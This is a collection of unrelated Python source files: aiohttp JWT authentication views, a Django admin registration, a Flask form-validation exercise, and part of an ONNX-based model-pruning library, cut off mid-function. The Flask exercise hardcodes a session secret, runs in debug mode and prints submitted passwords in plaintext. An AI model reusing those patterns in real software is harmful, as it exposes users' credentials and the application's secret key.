        return ExpressList(
            itemizedStringList(self.concepts(observer))).vt102(observer)

    def capitalizeConcept(self):
        # Capitalize only the first concept, working on a copy of the list.
        listOfConcepts = self.listOfConcepts[:]
        if listOfConcepts:
            listOfConcepts[0] = iimaginary.IConcept(listOfConcepts[0]).capitalizeConcept()
        return ItemizedList(listOfConcepts)
def itemizedStringList(desc):
    """Yield the elements of ``desc`` interleaved with English list
    punctuation: nothing for an empty list, the bare element for one,
    " and " between two, and Oxford-comma style (", " separators plus a
    final "and ") for three or more."""
    if not desc:
        return
    if len(desc) == 1:
        yield desc[0]
        return
    if len(desc) == 2:
        yield desc[0]
        yield u' and '
        yield desc[1]
        return
    # Three or more: every element but the last is followed by ", ",
    # then "and " introduces the final element.
    for item in desc[:-1]:
        yield item
        yield u', '
    yield u'and '
    yield desc[-1]
class ConceptTemplate(object):
    """
    A L{ConceptTemplate} wraps a text template which may intersperse literal
    strings with markers for substitution.

    Substitution markers follow U{the syntax for str.format<http://docs.python.org/2/library/string.html#format-string-syntax>}.
    Values for field names are supplied to the L{expand} method.
    """
    def __init__(self, templateText):
        """
        @param templateText: The text of the template.  For example,
            C{u"Hello, {target:name}."}.
        @type templateText: L{unicode}
        """
        self.templateText = templateText

    def expand(self, values):
        """
        Generate concepts based on the template.

        @param values: A L{dict} mapping substitution markers to application
            objects from which to take values for those substitutions.  For
            example, a key might be C{u"target"}.  The associated value will be
            sustituted each place C{u"{target}"} appears in the template
            string.  Or, the value's name will be substituted each place
            C{u"{target:name}"} appears in the template string.
        @type values: L{dict} mapping L{unicode} to L{object}

        @return: An iterator the combined elements of which represent the
            result of expansion of the template.  The elements are adaptable to
            L{IConcept}.
        """
        parts = Formatter().parse(self.templateText)
        for (literalText, fieldName, formatSpec, conversion) in parts:
            if literalText:
                yield ExpressString(literalText)
            if fieldName:
                try:
                    # Field names are case-insensitive: lower-cased on lookup.
                    target = values[fieldName.lower()]
                except KeyError:
                    # Unknown field: emit a visible placeholder rather than
                    # raising, so the rest of the template still renders.
                    extra = u""
                    if formatSpec:
                        extra = u" '%s'" % (formatSpec,)
                    yield u"<missing target '%s' for%s expansion>" % (
                        fieldName, extra)
                else:
                    if formatSpec:
                        # The format spec selects an _expand_<SPEC> method on
                        # this class (e.g. "name" -> _expand_NAME).
                        # A nice enhancement would be to delegate this logic to
                        # target.
                        try:
                            expander = getattr(
                                self, '_expand_' + formatSpec.upper()
                            )
                        except AttributeError:
                            yield u"<'%s' unsupported by target '%s'>" % (
                                formatSpec, fieldName)
                        else:
                            yield expander(target)
                    else:
                        yield target

    def _expand_NAME(self, target):
        """
        Get the name of a L{Thing}.
        """
        return target.name

    def _expand_PRONOUN(self, target):
        """
        Get the personal pronoun of a L{Thing}.
        """
        return Noun(target).heShe()
| StarcoderdataPython |
4919790 | """This module provides auth views."""
import uuid
from http import HTTPStatus
from aiohttp import web
from aiojobs.aiohttp import spawn
from aiohttp_jinja2 import render_template
from app.cache import (
cache,
RESET_PASSWORD_CACHE_KEY,
RESET_PASSWORD_CACHE_EXPIRE,
CHANGE_EMAIL_CACHE_KEY,
CHANGE_EMAIL_CACHE_EXPIRE
)
from app.models.user import User
from app.utils.response import make_response
from app.utils.errors import DatabaseError
from app.utils.validators import validate_email, validate_password
from app.utils.jwt import generate_token, decode_token
from app.utils.errors import TokenError
from app.utils.mail import send_reset_password_mail, send_change_email_mail, send_user_signup_mail
# Route table collecting this module's views; registered on the app at startup.
auth_routes = web.RouteTableDef()
@auth_routes.view("/v1/auth/signup")
class AuthSignUp(web.View):
    """Class that includes functionality to sign up user in system."""

    async def post(self):
        """Create a new user in system.

        Expects JSON body with ``email`` and ``password``; validates both,
        stores the hashed password, and sends a signup mail in the
        background.  Returns 201 with the new user's id/email on success.
        """
        body = self.request.body
        try:
            email, password = body["email"], body["password"]
        except KeyError:
            return make_response(
                success=False,
                message="Required fields email or password is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        # Collect all validation messages from both validators at once.
        validation_errors = validate_password(password) + validate_email(email)
        if validation_errors:
            return make_response(
                success=False,
                message=' '.join(validation_errors),
                http_status=HTTPStatus.BAD_REQUEST
            )

        # Only the hash is persisted, never the plaintext password.
        password_hash = User.generate_password_hash(password)
        try:
            user = await User.create(email=email, password=password_hash)
        except DatabaseError as err:
            return make_response(
                success=False,
                message=str(err),
                http_status=HTTPStatus.BAD_REQUEST
            )

        # Fire-and-forget: the welcome mail is sent from a background job.
        await spawn(self.request, send_user_signup_mail(user.email))

        response_data = {"id": user.id, "email": user.email}
        return make_response(
            success=True,
            message="The user was successfully created.",
            data=response_data,
            http_status=HTTPStatus.CREATED,
        )
@auth_routes.view("/v1/auth/signin")
class AuthSignIn(web.View):
    """Class that includes functionality to sign in user in system."""

    async def post(self):
        """Login a user if the supplied credentials are correct.

        On success returns a short-lived access JWT and a longer-lived
        refresh JWT, both carrying the user's id as a private claim.
        """
        body = self.request.body
        config = self.request.app.config
        try:
            email, password = body["email"], body["password"]
        except KeyError:
            return make_response(
                success=False,
                message="Required fields email or password is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        try:
            user = await User.get_by_email(email)
        except DatabaseError as err:
            # Unknown email is reported as 401, not 404, to avoid leaking
            # which addresses are registered.
            return make_response(
                success=False,
                message=str(err),
                http_status=HTTPStatus.UNAUTHORIZED
            )

        is_correct = user.check_password_hash(password)
        if not is_correct:
            return make_response(
                success=False,
                message="The provided password for such user is not correct.",
                http_status=HTTPStatus.UNAUTHORIZED
            )

        # Access token: short expiry, used on every request.
        token, token_exp = generate_token(
            secret_key=config.JWT_SECRET_KEY,
            private_claims={"user_id": user.id},
            exp_days=config.ACCESS_JWT_EXP_DAYS
        )
        # Refresh token: longer expiry, used only to mint new access tokens.
        refresh_token, refresh_token_exp = generate_token(
            secret_key=config.JWT_SECRET_KEY,
            private_claims={"user_id": user.id},
            exp_days=config.REFRESH_JWT_EXP_DAYS
        )

        response_data = {
            "access_token": token, "access_token_exp": token_exp,
            "refresh_access_token": refresh_token, "refresh_access_token_exp": refresh_token_exp
        }
        return make_response(
            success=True,
            message="The user was successfully authorized.",
            data=response_data,
            http_status=HTTPStatus.OK,
        )
@auth_routes.view("/v1/auth/refresh_access")
class AuthRefreshAccess(web.View):
    """Class that includes functionality to refresh access token for user."""

    async def post(self):
        """Return refreshed access token for a user.

        Validates the supplied refresh JWT and issues a fresh access token
        AND a fresh refresh token (rotating both on every call).
        """
        body = self.request.body
        config = self.request.app.config
        try:
            refresh_token = body["refresh_access_token"]
        except KeyError:
            return make_response(
                success=False,
                message="Required field refresh_access_token is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        try:
            payload = decode_token(refresh_token, config.JWT_SECRET_KEY)
        except TokenError as err:
            return make_response(
                success=False,
                message=f"Invalid refresh access token. {str(err)}",
                http_status=HTTPStatus.BAD_REQUEST
            )

        # The user id travels as a private claim inside the refresh token.
        user_id = payload["user_id"]
        token, token_exp = generate_token(
            secret_key=config.JWT_SECRET_KEY,
            private_claims={"user_id": user_id},
            exp_days=config.ACCESS_JWT_EXP_DAYS
        )
        refresh_token, refresh_token_exp = generate_token(
            secret_key=config.JWT_SECRET_KEY,
            private_claims={"user_id": user_id},
            exp_days=config.REFRESH_JWT_EXP_DAYS
        )

        response_data = {
            "access_token": token, "access_token_exp": token_exp,
            "refresh_access_token": refresh_token, "refresh_access_token_exp": refresh_token_exp
        }
        return make_response(
            success=True,
            message="The access token was successfully refreshed.",
            data=response_data,
            http_status=HTTPStatus.OK,
        )
@auth_routes.view("/v1/auth/change_password")
class AuthChangePasswordView(web.View):
    """Class that includes functionality to work with user password in system."""

    async def put(self):
        """Change password for user in case provided old password is correct.

        The acting user is identified by ``self.request.user_id`` (set by
        the auth middleware); the old password must verify before the new
        one is validated and stored as a hash.
        """
        body = self.request.body
        try:
            old_password, new_password = body["old_password"], body["new_password"]
        except KeyError:
            return make_response(
                success=False,
                message="Required fields old_password or new_password is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        try:
            user = await User.get_by_id(self.request.user_id)
        except DatabaseError as err:
            return make_response(
                success=False,
                message=str(err),
                http_status=HTTPStatus.BAD_REQUEST
            )

        is_correct = user.check_password_hash(old_password)
        if not is_correct:
            return make_response(
                success=False,
                message="The provided old password is not correct.",
                http_status=HTTPStatus.BAD_REQUEST
            )

        validation_errors = validate_password(new_password)
        if validation_errors:
            return make_response(
                success=False,
                message=f"Invalid new password: {' '.join(validation_errors)}",
                http_status=HTTPStatus.BAD_REQUEST
            )

        # Only the hash is persisted, never the plaintext password.
        password_hash = User.generate_password_hash(new_password)
        try:
            await User.update(self.request.user_id, password=password_hash)
        except DatabaseError:
            return make_response(
                success=False,
                message="The user password was not changed.",
                http_status=HTTPStatus.BAD_REQUEST
            )

        return make_response(
            success=True,
            message="The user password was successfully changed.",
            http_status=HTTPStatus.OK,
        )
@auth_routes.view("/v1/auth/reset_password")
class AuthResetPasswordView(web.View):
    """Class that includes functionality for user password resetting.

    Flow: POST emails the user a link carrying a one-time code; GET renders
    the reset form for that code; PUT consumes the code and stores the new
    password.

    Fixes: the PUT handler's body lookup used the corrupted key
    ``"<PASSWORD>"`` instead of ``"new_password"`` (the key its own error
    message documents), and the User.update call referenced the invalid
    name ``password_<PASSWORD>`` instead of the ``password_hash`` computed
    just above it.
    """

    async def get(self):
        """Render reset password form for the code in the query string."""
        try:
            reset_password_code = self.request.query["reset_password_code"]
        except KeyError:
            return make_response(
                success=False,
                message="Required param reset_password_code is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        return render_template(
            "reset_password.html",
            self.request,
            {"reset_password_code": reset_password_code}
        )

    async def post(self):
        """Kick off user password resetting.

        Generates a one-time code, caches it against the user id with an
        expiry, and mails the user a link embedding the code.
        """
        body = self.request.body
        try:
            email = body["email"]
        except KeyError:
            return make_response(
                success=False,
                message="Required field email is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        try:
            user = await User.get_by_email(email)
        except DatabaseError as err:
            return make_response(
                success=False,
                message=str(err),
                http_status=HTTPStatus.BAD_REQUEST
            )

        # One-time code stored in the cache; it expires automatically.
        reset_password_code = str(uuid.uuid4())
        reset_password_key = RESET_PASSWORD_CACHE_KEY.format(code=reset_password_code)
        await cache.set(reset_password_key, user.id, RESET_PASSWORD_CACHE_EXPIRE)

        reset_password_url = self.request.url.update_query({"reset_password_code": reset_password_code})
        # Send the mail from a background job so the response is not blocked.
        await spawn(self.request, send_reset_password_mail(user, str(reset_password_url)))

        return make_response(
            success=True,
            message=f"The email with link for password resetting should soon be delivered to {user.email}.",
            http_status=HTTPStatus.OK,
        )

    async def put(self):
        """Create a new password for user."""
        body = self.request.body
        try:
            new_password = body["new_password"]
            reset_password_code = body["reset_password_code"]
        except KeyError:
            return make_response(
                success=False,
                message="Required field new_password or reset_password_code is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )

        # The code maps back to the user id it was issued for.
        reset_password_key = RESET_PASSWORD_CACHE_KEY.format(code=reset_password_code)
        user_id = await cache.get(reset_password_key)
        if user_id is None:
            return make_response(
                success=False,
                message="Required field reset_password_code is not correct or expired.",
                http_status=HTTPStatus.BAD_REQUEST
            )

        validation_errors = validate_password(new_password)
        if validation_errors:
            return make_response(
                success=False,
                message=f"Invalid new password: {' '.join(validation_errors)}",
                http_status=HTTPStatus.BAD_REQUEST
            )

        # Only the hash is persisted, never the plaintext password.
        password_hash = User.generate_password_hash(new_password)
        try:
            await User.update(int(user_id), password=password_hash)
        except DatabaseError:
            return make_response(
                success=False,
                message="The user password was not changed.",
                http_status=HTTPStatus.BAD_REQUEST
            )

        # Invalidate the one-time code in the background once it is used.
        await spawn(self.request, cache.delete(reset_password_key))
        return make_response(
            success=True,
            message="The user password was successfully changed.",
            http_status=HTTPStatus.OK,
        )
@auth_routes.view("/v1/auth/change_email")
class AuthChangeEmailView(web.View):
    """Class that includes functionality to change user email."""

    async def post(self):
        """Send email changing confirmation to old user email."""
        payload = self.request.body
        user_id = self.request.user_id
        try:
            requested_email = payload["new_email"]
        except KeyError:
            return make_response(
                success=False,
                message="Required field new_email is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )
        email_errors = validate_email(requested_email)
        if email_errors:
            return make_response(
                success=False,
                message=' '.join(email_errors),
                http_status=HTTPStatus.BAD_REQUEST
            )
        try:
            user = await User.get_by_id(user_id)
        except DatabaseError as err:
            return make_response(
                success=False,
                message=str(err),
                http_status=HTTPStatus.BAD_REQUEST
            )
        if user.email == requested_email:
            return make_response(
                success=False,
                message="New email cannot be the same as your old email",
                http_status=HTTPStatus.BAD_REQUEST
            )
        # Store a one-time confirmation code mapping to the requested change.
        confirmation_code = str(uuid.uuid4())
        cache_key = CHANGE_EMAIL_CACHE_KEY.format(code=confirmation_code)
        await cache.set(
            cache_key,
            {"user_id": user_id, "new_email": requested_email},
            CHANGE_EMAIL_CACHE_EXPIRE,
        )
        confirmation_url = f"{self.request.url}/confirm?change_email_code={confirmation_code}"
        await spawn(self.request, send_change_email_mail(user, requested_email, str(confirmation_url)))
        return make_response(
            success=True,
            message=f"The email with link for email changing confirmation "
                    f"should soon be delivered to {user.email}.",
            http_status=HTTPStatus.OK,
        )
@auth_routes.view("/v1/auth/change_email/confirm")
class AuthChangeEmailConfirmView(web.View):
    """Class that includes functionality to confirm user email changing."""

    async def get(self):
        """Return confirm response of user email changing."""
        # TODO: return errors as html too
        try:
            confirmation_code = self.request.query["change_email_code"]
        except KeyError:
            return make_response(
                success=False,
                message="Required param change_email_code is not provided.",
                http_status=HTTPStatus.UNPROCESSABLE_ENTITY
            )
        cache_key = CHANGE_EMAIL_CACHE_KEY.format(code=confirmation_code)
        cached_change = await cache.get(cache_key)
        if not cached_change:
            return make_response(
                success=False,
                message="Required query argument change_email_code is not correct or was expired.",
                http_status=HTTPStatus.BAD_REQUEST
            )
        user_id = cached_change["user_id"]
        new_email = cached_change["new_email"]
        try:
            await User.update(user_id, email=new_email)
        except DatabaseError:
            return make_response(
                success=False,
                message="The user email was not updated.",
                http_status=HTTPStatus.BAD_REQUEST
            )
        return render_template(
            "change_email_confirm.html",
            self.request,
            {"new_email": new_email}
        )
| StarcoderdataPython |
1903492 | from django.contrib import admin
from .models import Balance, User
# Register your models here.
# Expose the account models in the Django admin with the default ModelAdmin.
admin.site.register(User)
admin.site.register(Balance)
| StarcoderdataPython |
6687266 | <reponame>justnclrk/Python
from flask import Flask, render_template, redirect, request, session, flash
import re
# Basic email shape check: local part, "@", domain, dot, alphabetic TLD.
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
# Secret key is required for flash() sessions; not suitable for production.
app.secret_key = 'KeepItSecretKeepItSafe'
@app.route('/')
def reg():
    """Render the registration form page."""
    return render_template('index.html')
@app.route('/form', methods=['POST'])
def form():
    """Validate the submitted registration form and flash errors or success.

    Checks that first/last name are present, the email is present and
    matches EMAIL_REGEX, the password is at least 8 characters, and the
    password and confirmation are identical.
    """
    error = False
    if len(request.form['first_name']) < 1:
        flash("First Name Error!")
        error = True
    if len(request.form['last_name']) < 1:
        flash("Last Name Error!")
        error = True
    if len(request.form['email']) < 1:
        flash("Enter Email!")
        error = True
    elif not EMAIL_REGEX.match(request.form['email']):
        flash("Enter Valid Email!")
        error = True
    if len(request.form['password']) < 8:
        flash("Password too short")
        error = True
    # Fix: the original compared only the *lengths* of password and confirm,
    # so two different passwords of equal length were accepted.
    if request.form['password'] != request.form['confirm']:
        flash("Passwords not the same!")
        error = True
    if error:
        return render_template('index.html')
    else:
        # Parenthesized single-argument prints run identically on Python 2 and 3.
        print(request.form['first_name'])
        print(request.form['last_name'])
        print(request.form['email'])
        print(request.form['password'])
        flash("Thank you for your submission, see you in the matrix!")
        return render_template('index.html')
# Start the Flask development server with the interactive debugger enabled.
app.run(debug=True)
| StarcoderdataPython |
1956302 | # -*- coding: utf-8 -*-
import torch
import torch.onnx
import torch.onnx.symbolic_helper
import torch.onnx.utils
import torch.nn as nn
import numpy as np
from collections import OrderedDict
from . import register
from . import mask_utils
from . import function_module
from typing import Dict, List
from torchpruner.operator import operator
from torchpruner.model_tools import *
import time
import copy
def create_operator(node):
    """Instantiate the operator class registered for this graph node's kind.

    The node kind has the form ``namespace::type``; the type part is used to
    look up the implementation in ``register.operator_reg``.
    """
    type_name = node.kind().split("::")[1]
    operator_class = register.operator_reg.get(type_name)
    if operator_class is None:
        raise RuntimeError("Can not find operator " + str(type_name))
    return operator_class(node)
max_search_time = 100000
def _operator_params_combine(params_list):
params_dict = {}
for params in params_list:
for key in params:
if not isinstance(params[key], int):
raise RuntimeError("The change params must be integer")
if key not in params_dict:
params_dict[key] = params[key]
else:
params_dict[key] += params[key]
return params_dict
def _get_all_modules(module_dict, prefix, names):
module_list = []
for name in names:
prefix = prefix + "." + name
module_list.append(module_dict[prefix])
return module_list
def _get_common(scope1, scope2):
prefix = ""
i = 0
while i < len(scope1) and i < len(scope2):
if scope1[i] == scope2[i]:
if prefix == "":
prefix += scope1[i]
else:
prefix = prefix + "." + scope1[i]
i += 1
else:
break
list1 = []
list2 = []
for j in range(i, len(scope1)):
list1.append(scope1[j])
for j in range(i, len(scope2)):
list2.append(scope2[j])
return prefix, list1, list2
def _cat_names(names):
name = names[0]
for i in range(1, len(names)):
name = name + "." + names[i]
return name
def _find_module_list(module_list, target):
keys = None
if isinstance(module_list, nn.ModuleList):
keys = range(0, len(module_list))
if isinstance(module_list, nn.ModuleDict):
keys = module_list.keys()
for key in keys:
if module_list[key] is target:
return [target._get_name(), str(key)]
if isinstance(module_list[key], (nn.ModuleList, nn.ModuleDict)):
return [module_list[key]._get_name(), str(key)] + _find_module_list(
module_list[key], target
)
return None
def _get_object_to_name_dict(model):
to_name_dict = {}
stack = []
stack.append([model, "self"])
while len(stack) != 0:
obj, name = stack.pop()
if isinstance(obj, nn.Module):
to_name_dict[id(obj)] = name
for key in obj._modules.keys():
stack.append([obj._modules[key], name + "." + key])
return to_name_dict
class scope_name_workaround(object):
    """Context manager that patches ``nn.Module._slow_forward`` during ONNX
    tracing so scopes are recorded as dotted attribute names (e.g.
    ``self.layer.0``) instead of torch's default class-based names.
    The original ``_slow_forward`` is restored on exit."""
    def __init__(self, model):
        # Original nn.Module._slow_forward, restored in __exit__.
        self.backup = None
        # id(module) -> dotted name, precomputed for the whole module tree.
        self.to_name_dict = _get_object_to_name_dict(model)
        # Scopes temporarily popped while a child module is being traced.
        self.scope_stack = []
    def __enter__(self):
        # NOTE(review): _tracing_name mirrors torch's internal helper but is
        # not referenced below; kept for parity with upstream torch code.
        def _tracing_name(self_, tracing_state):
            if not tracing_state._traced_module_stack:
                return None
            module = tracing_state._traced_module_stack[-1]
            for name, child in module.named_children():
                if child is self_:
                    return name
                if isinstance(child, (nn.ModuleList, nn.ModuleDict)):
                    search_result = _find_module_list(child, self_)
                    if search_result is not None:
                        search_result = [child._get_name(), name] + search_result
                        return search_result
            return None
        def _slow_forward(self_, *input, **kwargs):
            tracing_state = torch._C._get_tracing_state()
            if not tracing_state or isinstance(self_.forward, torch._C.ScriptMethod):
                return self_.forward(*input, **kwargs)
            # Swap the current scope for this module's dotted name, saving the
            # old scope so it can be re-pushed after the forward call.
            if tracing_state.current_scope() != "":
                self.scope_stack.append(tracing_state.current_scope())
                tracing_state.pop_scope()
            if id(self_) in self.to_name_dict:
                tracing_state.push_scope(self.to_name_dict[id(self_)])
            try:
                result = self_.forward(*input, **kwargs)
            finally:
                # Restore the caller's scope even if forward raised.
                if tracing_state.current_scope() != "":
                    tracing_state.pop_scope()
                if len(self.scope_stack) != 0:
                    tracing_state.push_scope(self.scope_stack[-1])
                    self.scope_stack.pop()
            return result
        self.backup = torch.nn.Module._slow_forward
        setattr(torch.nn.Module, "_slow_forward", _slow_forward)
    def __exit__(self, type, value, tb):
        setattr(torch.nn.Module, "_slow_forward", self.backup)
# DataNode
class DataNode(object):
    """A value (tensor) node in the traced graph.

    Wraps a torch graph value: records its name, scalar type and shape,
    links to the producing operator (``in_operator``) and consuming
    operators (``out_operators``), and provides cut analysis that
    propagates a pruning mask through the whole graph.
    """
    def __init__(self, node):
        # basic info
        self.name = "self." + node.debugName()
        self._type = None
        self._size = None
        self.kind = str(node.type().kind())
        if self.kind == "TensorType" or self.kind == "CompleteTensorType":
            sizes = node.type().sizes()
            if sizes is not None:
                self._size = list(sizes)
            self._type = str(node.type().scalarType())
        self._is_terminal = False
        self._is_input = False
        self._is_output = False
        # operator related
        self.in_operator: operator.OperatorNode = None
        self.out_operators: List[operator.OperatorNode] = []
        # data add with the hook
        self.data = None
        # add a key value changeable
        self._changeable = True
        # set the graph
        self.graph: ONNXGraph = None
    def get(self, indexs, dim):
        """Slice ``self.data`` with ``indexs`` applied along dimension ``dim``."""
        dict_tuple = []
        for _ in range(0, dim):
            dict_tuple.append(slice(None, None, None))
        dict_tuple.append(indexs)
        return self.data[tuple(dict_tuple)]
    def __str__(self):
        # Format: %name: Type(d0, d1, ...) or Unknown() when untyped.
        return_str = "%" + self.name + ": "
        if self._type is None:
            return return_str + "Unknown()"
        return_str += self._type
        return_str += "("
        if len(self._size) == 0:
            return_str += ")"
            return return_str
        for s in self._size:
            return_str += str(s)
            return_str += ", "
        return_str = return_str[:-2]
        return_str += ")"
        return return_str
    def __repr__(self):
        return self.__str__()
    def is_terminal(self):
        # True for parameter/buffer nodes (graph leaves).
        return self._is_terminal
    def is_input(self):
        return self._is_input
    def is_output(self):
        return self._is_output
    def is_changeable(self):
        return self._changeable
    def size(self, dim=None):
        """Return the full shape list, or the extent of dimension ``dim``."""
        if dim is None:
            return self._size
        if dim >= len(self._size):
            raise RuntimeError("the dim out of index")
        return self._size[dim]
    def type(self):
        return self._type
    def __len__(self):
        # Length of the first dimension; 0 when the shape is unknown/scalar.
        if self._size is None:
            return 0
        else:
            if len(self._size) == 0:
                return 0
            return self._size[0]
    def cut_analysis(self, index, dim):
        """Analyse the effect of cutting ``index`` along ``dim`` of this node.

        Builds a mask for this node and delegates to
        :meth:`cut_analysis_with_mask`.
        """
        mask = mask_utils.Mask(self._size)
        if not isinstance(index, (list, np.ndarray)):
            raise RuntimeError("The index must be a list or a ndarray")
        mask.set_mask([index], [dim])
        return self.cut_analysis_with_mask(mask)
    def cut_analysis_with_mask(self, mask):
        """Propagate ``mask`` through the graph from this node.

        Performs a worklist traversal: each operator adjacent to a masked
        node reports the masks induced on its other nodes, and newly grown
        masks are pushed back on the stack until a fixed point is reached.
        Returns a dict with "terminal", "iner" and "operator" sections
        mapping names to the indices/parameters affected by the cut.
        """
        times = 0
        mask_dict = OrderedDict()
        mask_dict[self.name] = mask
        operator_dict = OrderedDict()
        stack = []
        stack.append((self, mask, None))
        while len(stack) != 0:
            node, mask, push_operator = stack.pop()
            operators = node.out_operators
            operators = operators[:]
            if node.in_operator is not None:
                operators.append(node.in_operator)
            # remove the push_opeartion
            if push_operator is not None:
                for i in range(0, len(operators)):
                    if id(operators[i]) == id(push_operator):
                        del operators[i]
                        break
            # run analysis for operator
            for operator in operators:
                return_masks, operator_params = operator.analysis(node, mask)
                # handle operator_dict
                if operator_params is not None:
                    if operator.name not in operator_dict:
                        operator_dict[operator.name] = [operator_params]
                    else:
                        operator_dict[operator.name].append(operator_params)
                # handle return_dict
                for name in return_masks.keys():
                    return_node = self.graph.nodes[name]
                    if name in mask_dict.keys():
                        # Skip if already covered; otherwise merge the masks.
                        if mask_dict[name].include(return_masks[name]):
                            continue
                        mask_dict[name] = mask_utils.combine_mask(
                            [mask_dict[name], return_masks[name]]
                        )
                    else:
                        mask_dict[name] = return_masks[name]
                    # push stack
                    stack.append((return_node, return_masks[name].copy(), operator))
            times += 1
            if times >= max_search_time:
                raise RuntimeError("max search time exceed")
        conbine_dict = {}
        conbine_dict["terminal"] = {}
        conbine_dict["iner"] = {}
        conbine_dict["operator"] = {}
        for key in mask_dict.keys():
            node = self.graph.nodes[key]
            result = mask_dict[key].indexs()
            if not node.is_terminal():
                conbine_dict["iner"][key] = result
            else:
                conbine_dict["terminal"][key] = result
        for key in operator_dict.keys():
            conbine_dict["operator"][key] = _operator_params_combine(operator_dict[key])
        return conbine_dict
# the module class
class Module(object):
    """Mirror of one nn.Module (or parameter) in the traced graph.

    Holds the sub-module tree, the data nodes flowing in/out of the module,
    the operators executed inside it, and — for leaf parameters/tensors —
    the terminal DataNode that can be cut.
    """
    def __init__(self):
        self.name = ""
        self.sub_modules: Dict[str, Module] = OrderedDict()  # store the sub modules
        self.in_data: List[DataNode] = []  # the data may be used different times
        self.out_data: List[DataNode] = []  # the data may produced different times
        self.operators: List[
            operator.OperatorNode
        ] = []  # save the opeartor in current module
        self.nn_object: nn.Module = None  # bounding the actual object
        self.terminal_node: DataNode = None
    def cut_analysis(self, attribute_name, index, dim):
        """Run cut analysis on the terminal node at dotted ``attribute_name``.

        Raises RuntimeError when the attribute does not exist or is not a
        cuttable leaf (i.e. has no terminal node).
        """
        attrs = attribute_name.split(".")
        current_module = self
        for attr in attrs:
            if attr in current_module.sub_modules:
                current_module = current_module.sub_modules[attr]
            else:
                raise RuntimeError("Can not find attribute " + str(attribute_name))
        if current_module.terminal_node is None:
            raise RuntimeError("The target attribute is not cuttable")
        return current_module.terminal_node.cut_analysis(index, dim)
    def __str__(self):
        # "ClassName[self.<terminal name>]: <type/shape>" for leaves,
        # "ClassName[<module name>]" otherwise.
        return_string = ""
        class_string = str(self.nn_object.__class__)[8:-2]
        return_string += class_string
        return_string += "["
        if self.terminal_node is not None:
            return_string += "self."
            terminal_string = str(getattr(self, "terminal_node"))[1:]
            split_string = terminal_string.split(":")
            return_string += split_string[0]
            return_string += "]:"
            return_string += split_string[1][1:]
        else:
            return_string += self.name
            return_string += "]"
        return return_string
    def __repr__(self):
        return self.__str__()
class ONNXGraph(object):
    """Prunable graph built from an ONNX trace of a torch model.

    Maintains dictionaries of data nodes, operators and module mirrors, and
    supports forward shape/value propagation, FLOPs counting and lookup of
    modules by their bound nn.Module object.
    """
    def __init__(self, model, onnx_device="CPU"):
        if isinstance(
            model, (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
        ):
            print(
                "WARNING: The model is warped with the DataParallel, the Graph object just binding the model.module part"
            )
            self._model: nn.Module = model.module
        else:
            self._model: nn.Module = model
        self.modules: Dict[str, Module] = OrderedDict()
        self.inputs: Dict[str, DataNode] = OrderedDict()
        self.nodes: Dict[str, DataNode] = OrderedDict()
        self.outputs: Dict[str, DataNode] = OrderedDict()
        self.operators: Dict[str, operator.OperatorNode] = OrderedDict()
        self._device: str = onnx_device
    def __str__(self):
        out_string = ""
        for node in self.nodes.keys():
            out_string += str(self.nodes[node])
            out_string += "\n"
        for operator in self.operators.keys():
            out_string += str(self.operators[operator])
            out_string += "\n"
        return out_string
    def forward(self, inputs):
        """Bind ``inputs`` to the graph inputs and re-run shape/value fill."""
        # change the inputs
        if len(self.inputs.keys()) != len(inputs):
            raise RuntimeError(
                "The inputs numbers is wrong expected "
                + str(self.inputs.keys())
                + " but got "
                + str(len(inputs))
            )
        input_keys = list(self.inputs.keys())
        for i in range(0, len(inputs)):
            if list(inputs[i].size()) != list(self.inputs[input_keys[i]].size()):
                raise RuntimeError(
                    "The inputs must as the same size as the origin input"
                )
            self.inputs[input_keys[i]].data = inputs[i].numpy()
        for operator in self.operators:
            self.operators[operator].fill_shape()
            self.operators[operator].fill_value()
    def set_device(self, device):
        self._device = device
        for operator in self.operators:
            self.operators[operator].set_device(device)
    def get_device(self):
        return self._device
    def flops(self):
        """Return the total operator FLOPs, in millions (MFLOPs)."""
        total_flops = 0
        for operator in self.operators:
            total_flops += self.operators[operator].flops()
        return total_flops / 1000000
    def get_module_by_object(self, obj):
        """Return the Module mirror bound to ``obj``, or None."""
        for module_name in self.modules:
            c_module = self.modules[module_name]
            if id(c_module.nn_object) == id(obj):
                return c_module
        return None
    def build_graph(self, inputs, fill_value=True, training=False):
        """Trace the model with torch.onnx and populate the graph tables.

        ``inputs`` is a tuple of example tensors; when ``fill_value`` is True
        the operators also propagate concrete values, otherwise only shapes.
        """
        # prepare the data structure
        data_node_dict: Dict[str, DataNode] = OrderedDict()
        # input node dict
        input_node_dict: Dict[str, DataNode] = OrderedDict()
        # terminal_node_dict
        terminal_node_dict: Dict[str, DataNode] = OrderedDict()
        # output node dict
        output_node_dict: Dict[str, DataNode] = OrderedDict()
        # operator list
        operator_dict: Dict[str, DataNode] = OrderedDict()
        # module dict
        module_dict: Dict[str, Module] = OrderedDict()
        # check the function_module
        if function_module.function_module_activate() and not hasattr(
            self._model, "_init_function_module_ok"
        ):
            raise RuntimeError("Call the init_function_module in function_module mode")
        # deep copy the model so tracing cannot mutate the bound model
        model = copy.deepcopy(self._model)
        model = model.cpu()
        # preprocess the quantization node
        for module in model.modules():
            if isinstance(module, torch.quantization.FakeQuantize):
                module.calculate_qparams()
        model.apply(torch.quantization.disable_observer)
        with scope_name_workaround(model):
            torch.onnx.symbolic_helper._set_opset_version(11)
            graph, params_dict, torch_out = torch.onnx.utils._model_to_graph(
                model,
                inputs,
                _retain_param_name=True,
                do_constant_folding=False,
                training=training,
            )
            torch.onnx.symbolic_helper._set_opset_version(9)
        # create the inputs and the terminals
        inputs_number = len(inputs)
        input_nodes = list(graph.inputs())
        total_number = len(input_nodes)
        for i in range(0, total_number):
            data_node = DataNode(input_nodes[i])
            if i < inputs_number:
                data_node._is_input = True
                data_node._changeable = False
                data_node.data = inputs[i].numpy()
